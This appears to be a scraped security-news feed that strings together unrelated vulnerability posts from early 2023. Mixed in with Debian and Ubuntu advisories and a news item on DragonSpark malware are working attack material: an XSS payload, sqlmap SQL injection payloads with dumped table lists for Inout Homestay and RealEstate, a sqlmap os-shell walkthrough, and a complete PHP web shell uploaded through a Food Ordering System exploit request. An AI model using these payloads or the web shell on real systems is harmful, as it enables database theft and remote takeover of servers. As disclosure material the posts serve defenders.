Inout Search Engine version 10.1.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Search Engine 10.1.3                                                 ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpMethod: GETURL parameter 'page' is vulnerable to XSShttps://www.example.com/index.php?page=footer%2femailafriendlaten%3cimg%20src%3da%20onerror%3dalert(1)%3ef96cd[-] Done

Inout Search Engine 10.1.3 Cross Site Scripting

Inout Homestay version 2.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout Homestay 2.2                                                         ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php?page=search/searchdetailedbroom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=IndianapolisPOST parameter 'broom' is vulnerable to SQLIPOST parameter 'bathr' is vulnerable to SQLIPOST parameter 'beds' is vulnerable to SQLIPOST parameter 'numguest' is vulnerable to SQLIPath: /index.php?page=search/rentalslocation=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=IndianaPOST parameter 'guests' is vulnerable to SQLI---Parameter: broom (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split    Type: UNION query    Title: Generic UNION query (NULL) - 27 columns    Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split---[INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12[INFO] fetching tables for database: '*****_homestay'Database: *****_homestay[52 tables]+----------------------------------+| admin_account                    || admin_payment_details            || category_property                || chat_details                     || chat_messages                    || checkout_ipn                     || countries                        || coupon_detail                    || cron_details                     || custom_field                     || demo_message                     || email_details                    || email_templates                  || forgetpassword                   || host_rejected                    || inout_ipns                       || languages                        || list_date_request                || list_images                      || listing_date                     || listing_detail                   || listing_main                     || message_notify_app               || messages                         || msg_req_temp                     || ppc_currency                     || public_side_media_detail         || public_slide_images              || refund_creditupdate              || request_coupon_detail            || settings                         || superhost_detail                 || traveller_bank_deposit_history   || traveller_cancellation_modes     || traveller_cancelled              || user_account_detail              || user_address_verify_request      || user_details                     || user_email_verification          || user_listing_request             || user_refunddetails               || user_registration                || user_reviews                     || user_search_details              || user_settings                    || user_wishlist_mapping            || user_withdrawal_details          || userabusereport                  || userbank_pending_listing_request || usercancellationsaction          || wish_list                        || withdrawal_request               |+----------------------------------+[-] Done

Inout Homestay 2.2 SQL Injection

Debian Linux Security Advisory 5325-1 - It was discovered that SPIP, a website engine for publishing, would allow a malicious user to SQL injection attacks, or bypass authorization access.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5325-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondJanuary 24, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : spipIt was discovered that SPIP, a website engine for publishing, wouldallow a malicious user to SQL injection attacks, or bypassauthorization access.For the stable distribution (bullseye), this problem has been fixed inversion 3.2.11-3+deb11u6.We recommend that you upgrade your spip packages.For the detailed security status of spip please refer toits security tracker page at:https://security-tracker.debian.org/tracker/spipFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmPPpdYACgkQEL6Jg/PVnWT7GQgAgemz9C/cvulSLwEuV38WAaZwy8RFC3CGw3DirFLf2tVeC6KDI+tGs/u4XSY7M45xEr4y1TR3NMfovrnX6iR/JgPU/3ZJsFquq8O5Z9WCeZFe2YCkmuqP9hQvtxXfOoL4c9b1hfgtv4nVcqLyCFFJhfqLiAy8Eb18vzuggjLVYKa1kioa8wAGk/YBB9rvoKNN1bBfow7A7704Gk2bJMfcxIC9P4anHm6u0OZ4HgC0GYpVYZXegfrFICs7fylqgcg6Ub+HH+6e3wEDN1oqnj0IQDy09lFj4kCT5xQjhQM8oMZChExndWdmRRI2iEmUN/gg7RVhdUfNvv8VTy1lo+wd4g==XA3L-----END PGP SIGNATURE-----

Debian Security Advisory 5325-1

Organizations in East Asia are being targeted by a likely Chinese-speaking actor dubbed DragonSpark while employing uncommon tactics to go past security layers.
"The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation," SentinelOne said in an analysis published today.
A striking

Organizations in East Asia are being targeted by a likely Chinese-speaking actor dubbed **DragonSpark** while employing uncommon tactics to go past security layers.

"The attacks are characterized by the use of the little known open source SparkRAT and malware that attempts to evade detection through Golang source code interpretation," SentinelOne said in an analysis published today.

A striking aspect of the intrusions is the consistent use of SparkRAT to conduct a variety of activities, including stealing information, obtaining control of an infected host, or running additional PowerShell instructions.

The threat actor's end goals remain unknown as yet, although espionage or cybercrime is likely to be the motive. DragonSpark's ties to China stem from the use of the China Chopper web shell to deploy malware – a widely used attack pathway among Chinese threat actors.

Furthermore, not only do the open source tools used in the cyber assaults originate from developers or companies with links to China, the instructure for staging the payloads are located in Taiwan, Hong Kong, China, and Singapore, some of which belong to legitimate businesses.

The command-and-control (C2) servers, on the other hand, are situated in Hong Kong and the U.S., the cybersecurity firm said.

Initial access avenues entail compromising internet-exposed web servers and MySQL database servers to drop the China Chopper web shell. The foothold is then leveraged to carry out lateral movement, privilege escalation, and malware deployment using open source tools like SharpToken, BadPotato, and GotoHTTP.

Also delivered to the hosts are custom malware capable of executing arbitrary code and SparkRAT, a cross-platform remote access trojan that can run system commands, manipulate files and processes, and siphon information of interest.

Another malware of note is the Golang-based m6699.exe, which interprets at runtime the source code contained within it so as to fly under the radar and launch a shellcode loader that's engineered to contact the C2 server for fetching and executing the next-stage shellcode.

"Chinese-speaking threat actors are known to frequently use open source software in malicious campaigns," the researchers concluded.

"Since SparkRAT is a multi-platform and feature-rich tool, and is regularly updated with new features, we estimate that the RAT will remain attractive to cybercriminals and other threat actors in the future."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Utilize Golang Malware in DragonSpark Attacks to Evade Detection

Amano Xoffice parking solutions 7.1.3879 is vulnerable to SQL Injection.

Good day everyone! I hope all of you are doing well.

SQL Injection is one of the most critical vulnerabilities that can be found in web applications I will show you how we found SQL Injection vulnerability as an Authenticated user, which leads to compromising the back-end database while hunting.

**What SQL Injection is and how to spot it**

SQL injection is a code injection technique for applications with a database connection. The malicious user sends a crafted SQL query to extract, add, modify, or delete data from the database.

*   **Vulnerable Software**: Amano Xoffice parking solutions
*   **Vulnerability:** time-based blind SQL injection
*   **Affected Version:** 7.1 (7.1.3879)
*   **Vendor Homepage:**https://www.amano.eu/en/
*   **CVE:**2023–23331

**Amano Xoffice parking solutions:**

Amano’s Xoffice parking solutions refers to Xparc’s extensive, reliable carpark management software. This makes it the ideal solution for any type of car park.

**Required Components:**

**Burp Suite:** HTTP proxy tool for intercepting requests.

**sqlmap:** an open-source penetration testing tool that automates detecting and exploiting SQL injection flaws and taking over database servers.

**Steps to executions:**

1- Find the vulnerable parameter “**_dt\_insert”_**, and try using a different SQL injection wordlist with help of an intruder in burp-suite but we got nothing.

then inject the parameter using a different SQL injection payload and I get a delayed response on the vulnerable page with HTTP 200 ok response header when using PG\_SLEEP(5) payload.

2-We save the request and send it using sqlmap.

\*sqlmap request.req\*\*

In the below screenshot the request in burp-suite when injecting **dt\_insert** parameter with the payload.

burp-suite request

As seen below the SQL injection when we send the request through sqlmap and we get a different result Such as the operating system and back end DBMS.

Using sqlmap features os-shell we are able to get command execution shell on the back-end DBMS using the SQL injection vulnerability.

POC of the shell

*   **Acknowledgment:**

Thanks to the team i have been working with: Saleh alfawazan and Osama Aldosari.- Saudi information and technology company — SITE.

CVE-2023-23331: How I Found My FIRST SQL Injection CVE-2023–23331 - Fahad Almulhim (0xHunter) - Medium

IzyBat Orange casiers before 20221102_1 allows SQL Injection via a getCasier.php?taille= URI.

**Overview**

An authenticated remote attacker can perform a time based SQLi injection in Orange casiers database.  
Note: everyone can sign up to have a user account.

**Impact**

Informaction disclosure

**Details**

A time based SQLi has been detected on http://orange-casiers.fr/getCasier.php?taille=b via the “taille” parameter.  
The SQLi allowed us to dump the database containing: First name, family name, password’s hashes, badge serial numbers …

**Not affected version**

20221102\_1

**Proof of Concept**

You need to select a locker block that manage choosing a top or bottom locker.  
When ask if you prefer a top or bottom locker, visit the URL http://orange-casiers.fr/getCasier.php?taille=1’+OR’1’%3D’1 instead to get the first locker available regardless of its physical location.  
Revisiting the URL allow a user to get another locker, regardless of the limitation usually in place of 1 locker/person. In fact, you could reserve every single lockers available.

**Solution****Security patch**

Upgrade to 20221102\_1

**References****Credits**

Orange CERT-CC  
Hugo VOVARD at Orange group

**Timeline**

**Date reported:** November 2, 2022  
**Date fixed:** November 2, 2022

CVE-2023-22630: IzyBat Orange casiers - SQLi injection

Auth. SQL Injection (SQLi) vulnerability in WP-TopBar <= 5.36 versions.

**Solution**

Deactivate and delete. This plugin has been closed as of January 18, 2023 and is not available for download. This closure is temporary, pending a full review.

thiennv discovered and reported this SQL Injection vulnerability in WordPress WP TopBar Plugin. This could allow a malicious actor to directly interact with your database, including but not limited to stealing information and creating new administrator accounts. This vulnerability has not been known to be fixed yet.

**3 other known vulnerabilities for this plugin**To plugin page

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2023-23824: WordPress WP-TopBar plugin <= 5.36 - SQL Injection - Patchstack

Ubuntu Security Notice 5818-1 - It was discovered that PHP incorrectly handled certain inputs. An attacker could possibly use this issue to cause a crash or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5818-1  
January 23, 2023

php7.2, php7.4, php8.1 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

PHP could be made do crash or execute arbitrary code if it received  
a specially crafted input.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter  
- php7.4: HTML-embedded scripting language interpreter  
- php7.2: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain inputs.  
An attacker could possibly use this issue to cause a crash or  
execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  libapache2-mod-php7.4           8.1.7-1ubuntu3.2  
  libapache2-mod-php8.0           8.1.7-1ubuntu3.2  
  libapache2-mod-php8.1           8.1.7-1ubuntu3.2  
  php8.1                          8.1.7-1ubuntu3.2  
  php8.1-cgi                      8.1.7-1ubuntu3.2  
  php8.1-cli                      8.1.7-1ubuntu3.2  
  php8.1-sqlite3                  8.1.7-1ubuntu3.2

Ubuntu 22.04 LTS:  
  libapache2-mod-php7.4           8.1.2-1ubuntu2.10  
  libapache2-mod-php8.0           8.1.2-1ubuntu2.10  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.10  
  php8.1                          8.1.2-1ubuntu2.10  
  php8.1-cgi                      8.1.2-1ubuntu2.10  
  php8.1-cli                      8.1.2-1ubuntu2.10  
  php8.1-sqlite3                  8.1.2-1ubuntu2.10

Ubuntu 20.04 LTS:  
  libapache2-mod-php7.4           7.4.3-4ubuntu2.17  
  php7.4                          7.4.3-4ubuntu2.17  
  php7.4-cgi                      7.4.3-4ubuntu2.17  
  php7.4-cli                      7.4.3-4ubuntu2.17  
  php7.4-sqlite3                  7.4.3-4ubuntu2.17

Ubuntu 18.04 LTS:  
  libapache2-mod-php7.2           7.2.24-0ubuntu0.18.04.16  
  php7.2                          7.2.24-0ubuntu0.18.04.16  
  php7.2-cgi                      7.2.24-0ubuntu0.18.04.16  
  php7.2-cli                      7.2.24-0ubuntu0.18.04.16  
  php7.2-sqlite3                  7.2.24-0ubuntu0.18.04.16

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5818-1  
  CVE-2022-31631

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.7-1ubuntu3.2  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.10  
  https://launchpad.net/ubuntu/+source/php7.4/7.4.3-4ubuntu2.17  
  https://launchpad.net/ubuntu/+source/php7.2/7.2.24-0ubuntu0.18.04.16

Ubuntu Security Notice USN-5818-1

Inout RealEstate version 2.1.3 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : inoutscripts.com                                                           ││  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        ││  Software : Inout RealEstate 2.1.3                                                     ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpPOST parameter 'lidaray' is vulnerable to SQLIlidaray=[Inject-HERE]---Parameter: lidaray (POST)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: lidaray=' AND (SELECT 9508 FROM (SELECT(SLEEP(5)))BNUc) AND 'IpMJ'='IpMJ---[INFO] the back-end DBMS is MySQLback-end DBMS: MySQL >= 5.0.12[INFO] fetching tables for database: '*****_realestate'[INFO] fetching number of tables for database ''*****_realestate'Database: *****_realestate[45 tables]+--------------------------------+| adcode                         || admin_account                  || admin_payment_details          || agent_list_request_to_user     || broker_citymap                 || broker_rate                    || broker_review                  || brokerabusereport              || category_property              || chat_details                   || chat_messages                  || checkout_ipn                   || countries                      || custom_field                   || detail_statistics_list         || email_templates                || enquiry_status                 || forgetpassword                 || inout_ipns                     || invoicegen                     || languages                      || list_brokermap                 || list_images                    || list_main                      || listopenhouse                  || normal_statistics_list         || paymentdetailstat              || popularsearchlist              || ppc_currency                   || public_side_media_detail       || public_slide_images            || recentsearchlist               || settings                       || sold_listing                   || soldlistadd                    || traveller_bank_deposit_history || user_broker_licenses           || user_broker_registration       || user_email_verification        || user_list_agent_request        || user_registration              || user_wishlist_mapping          || userabusereport                || userlistactive                 || wish_list                      |+--------------------------------+[-] Done

Inout RealEstate 2.1.3 SQL Injection

Food Ordering System version 2 suffers from a remote shell upload vulnerability.

## Title: Food Ordering System v2 File upload Vulnerability + web-shell upload - RCE## Author: nu11secur1ty## Date: 01.23.2023## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0## Description:The Food Ordering System v2 suffers from, File Upload and web-shellupload RCE Vulnerabilities.The upload function for the background image hover of this system isnot sanitizing correctly.The attacker can upload some RCE malicious code and easily destroythis system. The status of this system is awful!## STATUS: HIGH Vulnerability[+] Exploit:```GETPOST /fos/admin/ajax.php?action=save_settings HTTP/1.1Host: pwnedhost.comContent-Length: 6157Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryqYQLHPx3VuntGH7WOrigin: http://pwnedhost.comReferer: http://pwnedhost.com/fos/admin/index.php?page=site_settingsAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=598nahp235ehmk2broafrh37qqConnection: close------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="name"Online Food Ordering System V2------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="email"info@sample.com------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="contact"+6948 8542 623------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="about"<p style="text-align: center; background: transparent; position:relative;"><span style="font-size:28px;background: transparent;position: relative;">ABOUT US</span></b></span></p><pstyle="text-align: center; background: transparent; position:relative;"><span style="background: transparent; position: relative;font-size: 14px;"><span style="font-size:28px;background: transparent;position: relative;"><b style="margin: 0px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-weight:400; text-align: justify;">&nbsp;is simply dummy text of the printingand typesetting industry. Lorem Ipsum has been the industry&#x2019;sstandard dummy text ever since the 1500s, when an unknown printer tooka galley of type and scrambled it to make a type specimen book. It hassurvived not only five centuries, but also the leap into electronictypesetting, remaining essentially unchanged. It was popularised inthe 1960s with the release of Letraset sheets containing Lorem Ipsumpassages, and more recently with desktop publishing software likeAldus PageMaker including versions of LoremIpsum.</span><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><span style="color: rgb(0, 0, 0); font-family: "OpenSans", Arial, sans-serif; font-weight: 400; text-align:justify;"><br></span></b></span></p><p style="text-align: center;background: transparent; position: relative;"><span style="background:transparent; position: relative; font-size: 14px;"><spanstyle="font-size:28px;background: transparent; position:relative;"><h2 style="font-size:28px;background: transparent;position: relative;">Where does it come from?</h2><pstyle="text-align: center; margin-bottom: 15px; padding: 0px; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif;font-weight: 400;">Contrary to popular belief, Lorem Ipsum is notsimply random text. It has roots in a piece of classical Latinliterature from 45 BC, making it over 2000 years old. RichardMcClintock, a Latin professor at Hampden-Sydney College in Virginia,looked up one of the more obscure Latin words, consectetur, from aLorem Ipsum passage, and going through the cites of the word inclassical literature, discovered the undoubtable source. Lorem Ipsumcomes from sections 1.10.32 and 1.10.33 of "de Finibus Bonorum etMalorum" (The Extremes of Good and Evil) by Cicero, written in 45 BC.This book is a treatise on the theory of ethics, very popular duringthe Renaissance. The first line of Lorem Ipsum, "Lorem ipsum dolor sitamet..", comes from a line in section1.10.32.</p></span></b></span></p>------WebKitFormBoundaryqYQLHPx3VuntGH7WContent-Disposition: form-data; name="img"; filename="pic.php"Content-Type: image/jpeg<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><html>  <head>    <meta http-equiv="Content-Type" content="text/html" charset="euc-kr">    <title>PHP Web Shell Ver 4.0 by nu11secur1ty</title>    <script type="text/javascript">      function FocusIn(obj)      {        if(obj.value == obj.defaultValue)          obj.value = '';      }            function FocusOut(obj)      {        if(obj.value == '')          obj.value = obj.defaultValue;      }    </script>  </head>  <body>    <b>WebShell's Location = http://<?php echo $_SERVER['HTTP_HOST'];echo $_SERVER['REQUEST_URI'] ?></b><br><br>        HTTP_HOST = <?php echo $_SERVER['HTTP_HOST'] ?><br>    REQUEST_URI = <?php echo $_SERVER['REQUEST_URI'] ?><br>        <br>        <form name="cmd_exec" method="post" action="http://<?php echo$_SERVER['HTTP_HOST']; echo $_SERVER['REQUEST_URI'] ?>">      <input type="text" name="cmd" size="70" maxlength="500"value="Input command to execute"onfocus="FocusIn(document.cmd_exec.cmd)"onblur="FocusOut(document.cmd_exec.cmd)">      <input type="submit" name="exec" value="exec">    </form>    <?php      if(isset($_POST['exec']))      {        exec($_POST['cmd'],$result);        echo '----------------- < OutPut > -----------------';        echo '<pre>';        foreach($result as $print)        {          $print = str_replace('<','<',$print);          echo $print . '<br>';        }        echo '</pre>';      }      else echo '<br>';    ?>        <form enctype="multipart/form-data" name="file_upload" method="post"action="http://<?php echo $_SERVER['HTTP_HOST']; echo$_SERVER['REQUEST_URI'] ?>">      <input type="file" name="file">      <input type="submit" name="upload" value="upload"><br>      <input type="text" name="target" size="100" value="Location wherefile will be uploaded (include file name!)"onfocus="FocusIn(document.file_upload.target)"onblur="FocusOut(document.file_upload.target)">    </form>    <?php      if(isset($_POST['upload']))      {        $check = move_uploaded_file($_FILES['file']['tmp_name'], $_POST['target']);                if($check == TRUE)          echo '<pre>The file was uploaded successfully!!</pre>';        else          echo '<pre>File Upload was failed...</pre>';      }    ?>  </body></html>------WebKitFormBoundaryqYQLHPx3VuntGH7W--```[+] Response:```HTTPHTTP/1.1 200 OKDate: Mon, 23 Jan 2023 12:27:44 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0X-Powered-By: PHP/8.2.0Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 1Connection: closeContent-Type: text/html; charset=UTF-81```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Food-Ordering-System-v2.0)## Reference:[href](https://portswigger.net/web-security/file-upload)## Proof and Exploit:[href](https://www.youtube.com/watch?v=t7RnRFnXTP4)## Proof and Exploit:[href](https://streamable.com/c026hq)## Time spent`01:00:00`

Tag

#sql